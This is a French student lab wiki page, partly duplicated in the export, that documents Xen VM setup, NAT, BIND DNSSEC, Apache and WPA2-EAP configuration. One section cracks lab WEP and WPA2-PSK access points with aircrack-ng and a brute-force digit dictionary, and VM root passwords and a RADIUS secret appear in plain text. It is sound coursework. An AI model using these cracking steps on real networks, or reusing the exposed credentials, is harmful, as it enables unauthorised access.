Sur capbreton, depuis <code>/etc/xen/SE4.CachyOS.cfg :</code><syntaxhighlight lang="shell"><br />
vif = [[...], 'mac=00:16:3E:8B:45:ED,bridge=SE4']<br />
</syntaxhighlight>Pour l'adresse mac on prend celui existant et on fait +1.<br />
<br />
Depuis <code>/etc/resolv.conf </code>:<syntaxhighlight lang="shell"><br />
nameserver 8.8.8.8<br />
<br />
</syntaxhighlight><br />
<br />
==== SSH 476 ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.3 ====<br />
<syntaxhighlight lang="shell"><br />
apt update<br />
apt upgrade<br />
<br />
apt install ssh<br />
apt install bind9<br />
apt install apache2<br />
</syntaxhighlight>(Dans TOUTES les VMs)<br />
<br />
On active le SSH en ajoutant dans <code>/etc/ssh/sshd_config</code> :<syntaxhighlight lang="shell"><br />
PermitRootLogin yes<br />
</syntaxhighlight>Pour redemarrer le service ssh :<syntaxhighlight lang="shell"><br />
/etc/init.d/ssh restart<br />
</syntaxhighlight>Pour la machine mandataire, ensuite après avoir reboot on peut faire dans nos machines de services :<syntaxhighlight lang="shell"><br />
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.10.0/24<br />
</syntaxhighlight> <br />
<br />
==== Mascarade ====<br />
Sur la mandataire : <syntaxhighlight lang="shell"><br />
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.10.3:22<br />
iptables-save<br />
<br />
</syntaxhighlight>Et on décommente cette ligne dans <code>/etc/sysctl.conf</code> : <syntaxhighlight lang="shell"><br />
net.ipv4.ip_forward=1<br />
</syntaxhighlight>Et maintenant nous pouvons nous connecter à notre machine de service en ssh : <syntaxhighlight lang="shell"><br />
#IPV4<br />
ssh root@193.48.57.166 -p 2202<br />
# IPV6<br />
ssh root@2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
</syntaxhighlight><br />
<br />
==== DNS ====<br />
Tout d'abord, il faut modifier <code>/etc/bind/named.conf.local</code> : <syntaxhighlight lang="shell"><br />
zone "archlinuxbtw.lol" {<br />
type master;<br />
file "/etc/bind/myZones/db.archlinuxbtw.lol";<br />
allow-transfer{secondaries;};<br />
notify yes;<br />
};<br />
<br />
acl "secondaries"{<br />
192.168.10.2;<br />
2001:660:4401:60a0:216:3eff:fe36:79d9;<br />
};<br />
<br />
zone "archlinux.lol" {<br />
type secondary;<br />
file "/etc/bind/backup/db.archlinux.lol";<br />
primaries{2001:660:4401:60a0:216:3eff:fe36:79d9;};<br />
};<br />
<br />
</syntaxhighlight>J'ai ensuite créée un dossier myZones puis j'ai créer db.archlinuxbtw.lol et j'y ai ajouter :<syntaxhighlight lang="shell"><br />
$TTL 400<br />
<br />
@ IN SOA ns.archlinuxbtw.lol admin.archlinuxbtw.lol (<br />
3609 ; Numero de version<br />
21600 ; Rafraichissement (6h)<br />
3600 ; Re-tentative (1h)<br />
2592000 ; Expiration (30j)<br />
86400 ; Cache negatif (24h)<br />
);<br />
<br />
IN NS ns.archlinuxbtw.lol.<br />
IN NS ns.archlinux.lol.<br />
@ IN A 193.48.57.166<br />
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
ns IN A 193.48.57.166<br />
ns IN AAAA 2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
<br />
www IN CNAME archlinuxbtw.lol<br />
<br />
</syntaxhighlight>Ensuite on restart le service via : <code>service named restart</code><br />
<br />
<br />
Création d'une clé<syntaxhighlight lang="shell"><br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout archlinuxbtw.lol.key -out archlinuxbtw.csr<br />
</syntaxhighlight><br />
[[Fichier:DNS Check.png|centré|vignette|452x452px|DNS Checker ]]<br />
Notre DNS est bien reconnu et la commande <code>dig @8.8.8.8 archlinuxbtw.lol</code> c'est grâce au Glue records.<br />
<br />
<br />
Génération des clés<br />
<br />
<br />
Changement nom machine <code>nano /etc/hostname : CachyOS</code><br />
<br />
Et dans /etc/hosts:<br />
<br />
127.0.1.1 archlinuxbtw.lol SE4.CachyOS<br />
<br />
==== DNSSEC ====<br />
Afin de protéger notre DNS contre des possibles attaques nous utiliserons DNSSEC. Ici nous utiliserons la politique DNSSEC : <code>"dnspol"</code><br />
Ensuite on crée le dossier keys et on donne les droits a bind d'écrire dedans avec :<syntaxhighlight lang="shell"><br />
mkdir /etc/bind/keys <br />
chown bind:bind /etc/bind/keys <br />
chmod 750 /etc/bind/keys<br />
</syntaxhighlight>Pour ce faire, dans <code>named.conf.local</code> il faut rajouter les 3 lignes à partir de "key-directory" :<syntaxhighlight lang="shell"><br />
key-directory "/etc/bind/keys";<br />
dnssec-policy "dnspol"; // DNSSEC automatique<br />
inline-signing yes;<br />
<br />
[...]<br />
<br />
dnssec-policy "dnspol" {<br />
keys {<br />
ksk key-directory lifetime unlimited algorithm 13;<br />
zsk key-directory lifetime unlimited algorithm 13;<br />
};<br />
nsec3param;<br />
};<br />
<br />
</syntaxhighlight>Pour l'activer, il faut restart bind9 avec <code>systemctl restart bind9</code><br />
<br />
Il ne reste qu'à ajouter la clé KSK sur Gandi et ensite on peut voir s'il fonctionne bien grace au site suivant : <nowiki>https://dnsviz.net</nowiki><br />
[[Fichier:DNSSec.png|centré|vignette|DNSSec]]<br />
<br />
<br />
Et on peut voir que nos clefs on bien été générer : <syntaxhighlight lang="shell"><br />
root@CachyOS:/etc/bind# ls keys/<br />
Karchlinuxbtw.lol.+013+24458.key Karchlinuxbtw.lol.+013+56682.key<br />
Karchlinuxbtw.lol.+013+24458.private Karchlinuxbtw.lol.+013+56682.private<br />
Karchlinuxbtw.lol.+013+24458.state Karchlinuxbtw.lol.+013+56682.state<br />
<br />
</syntaxhighlight><br />
<br />
==== Apache ====<br />
Dans ce repertoire <code>/etc/apache2/sites-availab</code>le : touch archlinuxbtw.lol.conf <br />
<br />
<br />
Je genere un crt via la commande : <br />
<br />
openssl x509 -req -days 365 -in archlinuxbtw.csr -signkey archlinuxb<br />
<br />
tw.lol.key -out archlinuxbtw.lol.crt<br />
<br />
<br />
Et je deplace mes fichiers dans : <br />
<br />
root@CachyOS:~# mv archlinuxbtw.lol.crt /etc/ssl/certs/ <br />
<br />
root@CachyOS:~# mv archlinuxbtw.lol.key /etc/ssl/private/ <br />
<br />
root@CachyOS:~# chmod 600 /etc/ssl/private/archlinuxbtw.lol.key<br />
<br />
Pour arreter le service par defaut : a2dissite 000-default.conf <br />
<br />
Et on verifie avec la commande : apache2ctl -S<br />
<br />
Iptable pour atteindres les ports https : <code># HTTP iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.10.3:80 # HTTPS iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination 192.168.10.3:443 iptables-save</code><br />
<br />
<br />
iptables -A FORWARD -p tcp -d 192.168.10.3 --dport 80 -j ACCEPT<br />
<br />
iptables -A FORWARD -p tcp -d 192.168.10.3 --dport 443 -j ACCEPT<br />
==== Effraction WiFi ====<br />
<br />
===== Cassage WEP =====<br />
Il faut tout faire sur la zabeth13 comme on avait tester sur 4 machines dans la semaine avec mon binome les cartes réseaux des autres machines ne marchent pas. <br />
<br />
Avec ip link je vois que l'interface wifi se nomme <code>wlx40a5ef0f679b</code>.<br />
<br />
On peut alors recuperer le bssid de notre réseau wifi a crack. Je suis le numéro 5 donc je dois crack la cracotte05 : <br />
<br />
<code>sudo airodump-ng wlx40a5ef0f679b</code><br />
<br />
<br />
Je recupere :<br />
<br />
<code>BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID</code><br />
<br />
<code>04:DA:D2:9C:50:54 -63 27 5 0 4 54e. WEP WEP cracotte05</code> <br />
<br />
Je peux alors dump correctement en filtrant seulement le bon bssid et le bon channel via cette commande : <br />
<br />
<code>sudo airodump-ng wlx40a5ef0f679b --write airodump --bssid 04:DA:D2:9C:50:54 -c4</code><br />
<br />
Et en parallele on lance ceci jusqu'a ce que la clef soit trouvé :<br />
<br />
<code>aircrack-ng airodump-01.cap</code><syntaxhighlight lang="shell"><br />
Aircrack-ng 1.7 <br />
<br />
<br />
[00:26:11] Tested 835 keys (got 68980 IVs)<br />
Got 70001 out of 70000 IVsStarting PTW attack with 70001 ivs.<br />
KB depth byte(vote)<br />
0 0/ 13 FF(97024) A3(79616) D9(79360) C5(78848) 3A(78592) E3(78592) 29(78336) D1(78336) E9(78080) 7C(77568) DF(77568) 34(76800) 85(76800) D8(76544) 24(76032) <br />
1 0/ 1 CA(108544) CB(80128) B5(79104) EB(78336) 10(77824) A8(77312) E5(76800) F8(76800) E7(76544) EE(76544) 27(76288) 4C(76288) 68(76288) CC(76288) E6(76288) <br />
2 2/ 2 A4(80128) 3A(78336) 14(76800) 5A(76544) D2(76544) 98(76032) 08(75776) 1D(75776) 40(75776) 99(75776) E4(75776) F2(75776) CD(75520) F7(75520) 56(75008) <br />
3 0/ 1 D1(100608) 89(79872) 22(77568) 11(77056) A0(77056) 9E(76800) B0(76800) 98(76544) A9(76544) 5A(76032) AB(76032) CD(76032) 9A(75776) 4D(75520) 51(75264) <br />
4 7/ 4 43(77312) 4E(76800) 0F(76544) 29(76544) BA(76544) 3E(76032) 61(75776) A6(75776) C6(75776) 89(75264) 21(75008) 5A(75008) 65(75008) C8(75008) DD(75008) <br />
<br />
KEY FOUND! [ FF:FF:FF:FF:FA:BC:06:CB:AE:EE:EE:EE:EE ] <br />
Decrypted correctly: 100%<br />
<br />
<br />
</syntaxhighlight><br />
<br />
===== Cassage WPA-PKS =====<br />
Ce script python permet de creer un dictionnaire :<syntaxhighlight lang="python"><br />
with open("dictionnaire_8_chiffres.txt", "w") as f:<br />
for i in range(100000000): # Pour générer des nombres de 00000000 à 99999999<br />
f.write(f"{i:08d}\n") # Écrit le nombre avec 8 chiffres<br />
<br />
</syntaxhighlight>ou alors avec crunch :<br />
<br />
<code>crunch 8 8 0123456789 -o dictionnaire_8_chiffres.txt</code><br />
<br />
Ensuite après execution nous pouvons recuperer le fichier .txt créer.<br />
<br />
On récuperer le dump comme precedemment pour cette borne pour mon cas :<br />
<br />
<code>BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID</code><br />
<br />
<code>44:AD:D9:5F:87:04 -43 3 5 2 13 54e. WPA2 CCMP PSK kracotte05</code> <br />
<br />
Je peux alors dump correctement en filtrant seulement le bon bssid et le bon channel via cette commande :<code>sudo airodump-ng wlx40a5ef0f679b --write airodumpWPA --bssid 44:AD:D9:5F:87:04 -c13</code><br />
<br />
Et ensuite après avoir récuperer 1 data minimum :<br />
<br />
<code>aircrack-ng airodump-01.cap</code><br />
<br />
<br />
Et enfin on attend (c'est long si vous vous demander... tres looong faite la suite en attendant :<syntaxhighlight lang="bash"><br />
Aircrack-ng 1.7 <br />
<br />
[00:35:36] 66631280/100000000 keys tested (30842.35 k/s) <br />
<br />
Time left: 18 minutes, 1 second 66.63%<br />
<br />
KEY FOUND! [ 66685666 ]<br />
<br />
<br />
Master Key : EF 69 DE 33 B4 7F AA 9E 20 AB 3C AF F1 F7 3E A8 <br />
61 7C 80 F2 3C A9 FE B6 9A 72 98 B3 20 B3 2A A6 <br />
<br />
Transient Key : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 <br />
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 <br />
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 <br />
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 <br />
<br />
EAPOL HMAC : AD 95 F2 4D 5A 3F 4A 57 CD D8 0E EA A6 14 8B 1A <br />
<br />
<br />
</syntaxhighlight><br />
<br />
==== Sécurisation WiFi par WPA2-EAP ====<br />
Depuis notre machine de service on va se connecter sur notre borne wifi, ici on prend l'IP de la E304 :<br />
<br />
<code>ssh -oKexAlgorithms=+diffie-hellman-group11-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.4</code><br />
<br />
<syntaxhighlight lang="bash"><br />
conf t<br />
<br />
aaa new-model<br />
aaa authentication login eap_student5 group radius_student5<br />
radius-server host 192.168.10.3 auth-port 1812 acct-port 1813 key secret_student5 <br />
aaa group server radius radius_student5 <br />
server 192.168.10.3 auth-port 1812 acct-port 1813 <br />
exit<br />
<br />
dot11 ssid VM_SERVICES_5 <br />
vlan 15 <br />
authentication open eap eap_student5 <br />
authentication network-eap eap_student5<br />
authentication key-management wpa<br />
mbssid guest-mode<br />
exit<br />
<br />
interface Dot11Radio0<br />
encryption vlan 15 mode ciphers aes-ccm <br />
exit<br />
<br />
interface Dot11Radio0.15<br />
encapsulation dot1Q 15<br />
bridge-group 15<br />
exit<br />
<br />
interface GigabitEthernet0.15<br />
encapsulation dot1Q 15<br />
bridge-group 15<br />
exit<br />
<br />
interface Dot11Radio0<br />
ssid VM_SERVICES_5<br />
exit<br />
<br />
<br />
</syntaxhighlight><br />
<br />
<br />
<br />
et l'IP de la E305 :<br />
<br />
<code>ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.3</code><br />
<br />
<br />
Et ensuite sur le routeur :<syntaxhighlight lang="shell"><br />
conf t<br />
<br />
ip dhcp pool PoolCedric<br />
network 10.60.5.0 255.255.255.0<br />
dns-server 193.48.57.166<br />
default-router 10.60.5.254<br />
exit<br />
<br />
exit<br />
write<br />
</syntaxhighlight><syntaxhighlight lang="shell"><br />
interface Vlan15<br />
description "VLAN personnel de Cedric PAYET (E5) - WPA2-EAP"<br />
ip address 10.60.5.2 255.255.255.0<br />
ipv6 address 2001:660:4401:60a5::2/64<br />
vrrp 15 address-family ipv4<br />
priority 110<br />
address 10.60.5.1 primary<br />
exit-vrrp<br />
end<br />
<br />
</syntaxhighlight><syntaxhighlight lang="shell"><br />
conf t<br />
vlan 15<br />
name E5-Cedric<br />
exit<br />
exit<br />
write<br />
</syntaxhighlight><br />
<br />
=== Utiles ===<br />
<br />
=== XEN ===<br />
''<u>Liste des VMs allumées :</u>'' <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
''<u>Se connecter à la VM :</u>''<syntaxhighlight lang="shell"><br />
xen console <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
''<u>Sortir de la console xen :</u>''<syntaxhighlight lang="shell"><br />
Ctrl + Shift + 5<br />
</syntaxhighlight>''<u>Eteindre une VM :</u>'' <syntaxhighlight lang="shell"><br />
xen shutdown <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
<br />
''<u>Allumer une VM :</u>''<syntaxhighlight lang="shell"><br />
xen create /etc/xen/<nomMachine>.cfg<br />
</syntaxhighlight></div>
Cpayet
https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E5&diff=12204
Atelier SysRes SE4 2025/2026 E5
2026-02-10T16:41:36Z
<p>Cpayet : /* Compte rendu des commandes effectués */</p>
<hr />
<div>=== Compte rendu des commandes effectués ===<br />
<br />
==== Etape 1 : Connexion SSH ====<br />
ssh root@capbreton<br />
<br />
Mot de passe : <br />
<br />
==== Etape 2 : Créer un fichier dans le répertoire /etc/network/interfaces.d du Dom0 aux noms du binôme concerné ====<br />
On se déplace à ce répertoire :<syntaxhighlight lang="shell"><br />
cd /etc/network/interfaces.d/<br />
</syntaxhighlight>On créer ensuite ensuite un fichier aux noms de notre binôme et on l'édite :<syntaxhighlight lang="shell"><br />
touch SE42026_cpayet_tdelobel<br />
vim SE42026_cpayet_tdelobel<br />
<br />
</syntaxhighlight>Puis on donne un nom au bridge, ici c'est `pont_pacman`et on met dans le fichier ceci :<syntaxhighlight lang="shell"><br />
auto pont_pacman<br />
iface pont_pacman inet manual<br />
bridge_ports none<br />
up ip link set $IFACE up<br />
down ip link set $IFACE down<br />
</syntaxhighlight>Une fois le pont créer, il faut le démarrer :<syntaxhighlight lang="shell"><br />
ifup pont_pacman<br />
</syntaxhighlight><br />
<br />
==== Etape 3 : Création des VMs ====<br />
<syntaxhighlight lang="shell"><br />
xen-create-image --hostname=SE4.CachyOS --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.Manjaro --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.LinusTorvalds --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
</syntaxhighlight>On adapte les hostnames en fonction des nom de nos machines. <br />
<br />
'''''IMPORTANT :''''' Les résultats des commandes sont à noter car ellles contiennent les mots de passe et autres informations importantes.<br />
<br />
===== Nos résultats : =====<br />
CachyOS : <syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.CachyOS<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:8B:45:EC<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:p+nECGSXOPvFjDjk+/x8adAn8JxTTPjuknCTcFZxJNk (DSA)<br />
SSH Fingerprint : SHA256:YaNMhK5ZFF/TshemMHSmt08R9uBPAnhNK134XEZ0CuY (ECDSA)<br />
SSH Fingerprint : SHA256:qQNuBNfAoySUPOFPplDh8p0ZPtxRulz/vbOq+Pm4gwM (ED25519)<br />
SSH Fingerprint : SHA256:psWV2TNuHsZcRelqipM7TJ/mE4cvFI+oxndg6nvCpCk (RSA)<br />
Root Password : 6nyCiterydiMtnxsPDRsUys<br />
<br />
</syntaxhighlight>Manjaro : <syntaxhighlight lang="shell"><br />
<br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.Manjaro<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:36:79:D8<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:n+ojtWyKBODRtEppjCvAp6nd2cjL/Ily54j0cM03lMc (DSA)<br />
SSH Fingerprint : SHA256:K+Qa9NAU3JIGsMy3LEYCgFbfL3ozuiRKG+U3XsbV5ow (ECDSA)<br />
SSH Fingerprint : SHA256:AJLfxk4Zz8BZflWYOS8mifapH+uAFgGKA3WSj6rN0NA (ED25519)<br />
SSH Fingerprint : SHA256:/6iWOWoii0nJsbScwVYIGQAbuTI1/YIpaRyRdBl8mwE (RSA)<br />
Root Password : PgvMbhYvgtksg8tmiJnVZnQ<br />
</syntaxhighlight>LinusTorvalds :<syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.LinusTorvalds<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:AA:BF:EF<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:ouY/2dce0YI/mJD9Qw68oKU0xdw6Cs9ybgJxRm/FKiI (DSA)<br />
SSH Fingerprint : SHA256:p5lZznE0q8j6c68YTF5toYgBugOkc0IopTO+Ce9SiZ8 (ECDSA)<br />
SSH Fingerprint : SHA256:FbqBOG+0bBjuQBOlAytAlbMV/9VoJ8BAlFadG/VaGD4 (ED25519)<br />
SSH Fingerprint : SHA256:FCEtQGUhMhN9DDtTmt5zts/9PeC7ahnmJA7UOhMnGeg (RSA)<br />
Root Password : ekrmCSKb3ZAxXSYvNpjbiSK<br />
</syntaxhighlight><br />
<br />
==== Etape 4 : ====<br />
PHRASE MANQUANTE<syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.Manjaro.cfg<br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
xen create /etc/xen/SE4.LinusTorvalds.cfg<br />
</syntaxhighlight>On vérifie la liste des machines lancées via : <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
===== Nos résultats : =====<br />
<syntaxhighlight lang="shell"><br />
Name ID Mem VCPUs State Time(s)<br />
SE4.CachyOS 83 2048 1 -b---- 5.6<br />
SE4.Manjaro 85 2048 1 -b---- 5.8<br />
SE4.LinusTorvalds 87 2048 1 -b---- 5.3<br />
</syntaxhighlight><br />
<br />
==== Etape 5 : Partition ====<br />
<br />
===== Sur capbreton =====<br />
<br />
On partionne avec cette commande :<syntaxhighlight lang="shell"><br />
lvcreate -n SE4.CachyOS.var -L 10G virtual<br />
</syntaxhighlight><br />
On éteint notre machine : <syntaxhighlight lang="shell"><br />
xen shutdown SE4.CachyOS<br />
</syntaxhighlight><br />
Et on modifie :<syntaxhighlight lang="shell"><br />
vim /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
disk = [<br />
[...],<br />
'phy:/dev/virtual/SE4.CachyOS.home,xvda3,w',<br />
'phy:/dev/virtual/SE4.CachyOS.var,xvdb1,w'<br />
]<br />
</syntaxhighlight><br />
<br />
===== Sur la machine mandataire =====<br />
<br />
Nous ajoutons les partitions dans '''''/etc/fstab''''' : <syntaxhighlight lang="shell"><br />
/dev/xvda3 /var ext4 defaults 0 2<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
</syntaxhighlight><br />
<br />
Nous formatons les partitions avant de les utiliser : <syntaxhighlight lang="shell"><br />
mkfs -t ext4 /dev/xvda3<br />
mkfs -t ext4 /dev/xvdb1<br />
</syntaxhighlight><br />
<br />
Nous copions le contenu de '''/var''' : <syntaxhighlight lang="shell"><br />
mount /dev/xvda3 /mnt<br />
mv /var/* /mnt<br />
umount /mnt<br />
</syntaxhighlight><br />
<br />
Nous montons ensuite automatiquement les partitions définies dans '''/etc/fstab''' : <syntaxhighlight lang="shell"><br />
mount -a<br />
</syntaxhighlight><br />
<br />
===== De nouveaux sur capbreton =====<br />
On redémarre notre machine : <syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Ensuite on se connecte à notre VM via :<syntaxhighlight lang="shell"><br />
xen console SE4.CachyOS<br />
</syntaxhighlight><br />
<br />
===== Machines de Service - CachyOS & Manjaro =====<br />
Dans notre VM :<br />
<br />
On modifie :<syntaxhighlight lang="shell"><br />
vim /etc/network/interfaces<br />
</syntaxhighlight><br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
auto lo<br />
iface lo inet loopback<br />
<br />
auto eth0<br />
iface eth0 inet static<br />
address 192.168.10.3/24<br />
gateway 192.168.10.1<br />
<br />
# Pour l'ipv6<br />
auto eth1<br />
iface eth1 inet6 auto<br />
<br />
</syntaxhighlight><br />
<br />
* 172.60.0.3 est l'adresse IPV4 de la VM CachyOS<br />
<br />
===== Machine Mandataire - LinusTorvalds =====<br />
La machine mandataire agit comme passerelle IPv4 pour les machines de services. Voici sa configuration réseau :<br />
<br />
La machine mandataire va posséder trois adresses. Une adresse IPv6 routée, une adresse IPv4 routée et une adresse IPv4 pour le réseau privé avec ces deux machines de services. Pour ce faire, nous devons au préalable configurer une nouvelle interface eth1 pour y intégrer la seconde adresse IPv4.<br />
<br />
Sur capbreton, depuis <code>/etc/xen/SE4.CachyOS.cfg :</code><syntaxhighlight lang="shell"><br />
vif = [[...], 'mac=00:16:3E:8B:45:ED,bridge=SE4']<br />
</syntaxhighlight>Pour l'adresse mac on prend celui existant et on fait +1.<br />
<br />
Depuis <code>/etc/resolv.conf </code>:<syntaxhighlight lang="shell"><br />
nameserver 8.8.8.8<br />
<br />
</syntaxhighlight><br />
<br />
==== SSH 476 ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.3 ====<br />
<syntaxhighlight lang="shell"><br />
apt update<br />
apt upgrade<br />
<br />
apt install ssh<br />
apt install bind9<br />
apt install apache2<br />
</syntaxhighlight>(Dans TOUTES les VMs)<br />
<br />
On active le SSH en ajoutant dans <code>/etc/ssh/sshd_config</code> :<syntaxhighlight lang="shell"><br />
PermitRootLogin yes<br />
</syntaxhighlight>Pour redemarrer le service ssh :<syntaxhighlight lang="shell"><br />
/etc/init.d/ssh restart<br />
</syntaxhighlight>Pour la machine mandataire, ensuite après avoir reboot on peut faire dans nos machines de services :<syntaxhighlight lang="shell"><br />
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.10.0/24<br />
</syntaxhighlight> <br />
<br />
==== Mascarade ====<br />
Sur la mandataire : <syntaxhighlight lang="shell"><br />
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.10.3:22<br />
iptables-save<br />
<br />
</syntaxhighlight>Et on décommente cette ligne dans <code>/etc/sysctl.conf</code> : <syntaxhighlight lang="shell"><br />
net.ipv4.ip_forward=1<br />
</syntaxhighlight>Et maintenant nous pouvons nous connecter à notre machine de service en ssh : <syntaxhighlight lang="shell"><br />
#IPV4<br />
ssh root@193.48.57.166 -p 2202<br />
# IPV6<br />
ssh root@2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
</syntaxhighlight><br />
<br />
==== DNS ====<br />
Tout d'abord, il faut modifier <code>/etc/bind/named.conf.local</code> : <syntaxhighlight lang="shell"><br />
zone "archlinuxbtw.lol" {<br />
type master;<br />
file "/etc/bind/myZones/db.archlinuxbtw.lol";<br />
allow-transfer{secondaries;};<br />
notify yes;<br />
};<br />
<br />
acl "secondaries"{<br />
192.168.10.2;<br />
2001:660:4401:60a0:216:3eff:fe36:79d9;<br />
};<br />
<br />
zone "archlinux.lol" {<br />
type secondary;<br />
file "/etc/bind/backup/db.archlinux.lol";<br />
primaries{2001:660:4401:60a0:216:3eff:fe36:79d9;};<br />
};<br />
<br />
</syntaxhighlight>J'ai ensuite créée un dossier myZones puis j'ai créer db.archlinuxbtw.lol et j'y ai ajouter :<syntaxhighlight lang="shell"><br />
$TTL 400<br />
<br />
@ IN SOA ns.archlinuxbtw.lol admin.archlinuxbtw.lol (<br />
3609 ; Numero de version<br />
21600 ; Rafraichissement (6h)<br />
3600 ; Re-tentative (1h)<br />
2592000 ; Expiration (30j)<br />
86400 ; Cache negatif (24h)<br />
);<br />
<br />
IN NS ns.archlinuxbtw.lol.<br />
IN NS ns.archlinux.lol.<br />
@ IN A 193.48.57.166<br />
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
ns IN A 193.48.57.166<br />
ns IN AAAA 2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
<br />
www IN CNAME archlinuxbtw.lol<br />
<br />
</syntaxhighlight>Ensuite on restart le service via : <code>service named restart</code><br />
<br />
<br />
Création d'une clé<syntaxhighlight lang="shell"><br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout archlinuxbtw.lol.key -out archlinuxbtw.csr<br />
</syntaxhighlight><br />
[[Fichier:DNS Check.png|centré|vignette|452x452px|DNS Checker ]]<br />
Notre DNS est bien reconnu et la commande <code>dig @8.8.8.8 archlinuxbtw.lol</code> c'est grâce au Glue records.<br />
<br />
<br />
Génération des clés<br />
<br />
<br />
Changement nom machine <code>nano /etc/hostname : CachyOS</code><br />
<br />
Et dans /etc/hosts:<br />
<br />
127.0.1.1 archlinuxbtw.lol SE4.CachyOS<br />
<br />
==== DNSSEC ====<br />
Afin de protéger notre DNS contre des possibles attaques nous utiliserons DNSSEC. Ici nous utiliserons la politique DNSSEC : <code>"dnspol"</code><br />
Ensuite on crée le dossier keys et on donne les droits a bind d'écrire dedans avec :<syntaxhighlight lang="shell"><br />
mkdir /etc/bind/keys <br />
chown bind:bind /etc/bind/keys <br />
chmod 750 /etc/bind/keys<br />
</syntaxhighlight>Pour ce faire, dans <code>named.conf.local</code> il faut rajouter les 3 lignes à partir de "key-directory" :<syntaxhighlight lang="shell"><br />
key-directory "/etc/bind/keys";<br />
dnssec-policy "dnspol"; // DNSSEC automatique<br />
inline-signing yes;<br />
<br />
[...]<br />
<br />
dnssec-policy "dnspol" {<br />
keys {<br />
ksk key-directory lifetime unlimited algorithm 13;<br />
zsk key-directory lifetime unlimited algorithm 13;<br />
};<br />
nsec3param;<br />
};<br />
<br />
</syntaxhighlight>Pour l'activer, il faut restart bind9 avec <code>systemctl restart bind9</code><br />
<br />
Il ne reste qu'à ajouter la clé KSK sur Gandi et ensite on peut voir s'il fonctionne bien grace au site suivant : <nowiki>https://dnsviz.net</nowiki><br />
[[Fichier:DNSSec.png|centré|vignette|DNSSec]]<br />
<br />
<br />
Et on peut voir que nos clefs on bien été générer : <syntaxhighlight lang="shell"><br />
root@CachyOS:/etc/bind# ls keys/<br />
Karchlinuxbtw.lol.+013+24458.key Karchlinuxbtw.lol.+013+56682.key<br />
Karchlinuxbtw.lol.+013+24458.private Karchlinuxbtw.lol.+013+56682.private<br />
Karchlinuxbtw.lol.+013+24458.state Karchlinuxbtw.lol.+013+56682.state<br />
<br />
</syntaxhighlight><br />
<br />
==== Apache ====<br />
Dans ce repertoire <code>/etc/apache2/sites-availab</code>le : touch archlinuxbtw.lol.conf <br />
<br />
<br />
Je genere un crt via la commande : <br />
<br />
openssl x509 -req -days 365 -in archlinuxbtw.csr -signkey archlinuxb<br />
<br />
tw.lol.key -out archlinuxbtw.lol.crt<br />
<br />
<br />
Et je deplace mes fichiers dans : <br />
<br />
root@CachyOS:~# mv archlinuxbtw.lol.crt /etc/ssl/certs/ <br />
<br />
root@CachyOS:~# mv archlinuxbtw.lol.key /etc/ssl/private/ <br />
<br />
root@CachyOS:~# chmod 600 /etc/ssl/private/archlinuxbtw.lol.key<br />
<br />
Pour arreter le service par defaut : a2dissite 000-default.conf <br />
<br />
Et on verifie avec la commande : apache2ctl -S<br />
<br />
